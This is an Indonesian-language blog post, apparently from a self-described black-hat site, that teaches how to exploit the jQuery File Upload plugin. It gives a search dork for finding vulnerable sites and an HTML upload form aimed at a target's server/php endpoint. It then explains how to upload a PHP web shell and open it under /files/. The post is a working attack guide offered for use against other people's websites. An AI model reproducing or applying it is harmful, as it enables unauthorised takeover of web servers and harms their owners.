exploit jquery file upload vulnerability

cara exploit jquery file upload vulnerability dengan mudah.silakan gunakan dork di bawah ini atau bisa kembangakan sendiri

Dork : /assets/global/plugins/jquery-file-upload/site:,com

 kalau sudah dapat tinggal di exploit saja
Exploit : http://localhost/assets/global/plugins/jquery-file-upload/server/php/


Script CSRF :
<form method="POST" action="http://target.com/assets/global/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
 masukan domain target seve as format html


tinggal uplod  shell

nanti akan menampilakan


 tinggal tambahin saja /files/nama.php
http://assets/global/plugins/jquery-file-upload/server/php/files/namashell.php

Share on Google Plus

About internet

cirebo bl4ck h4t
    Blogger Comment
    Facebook Comment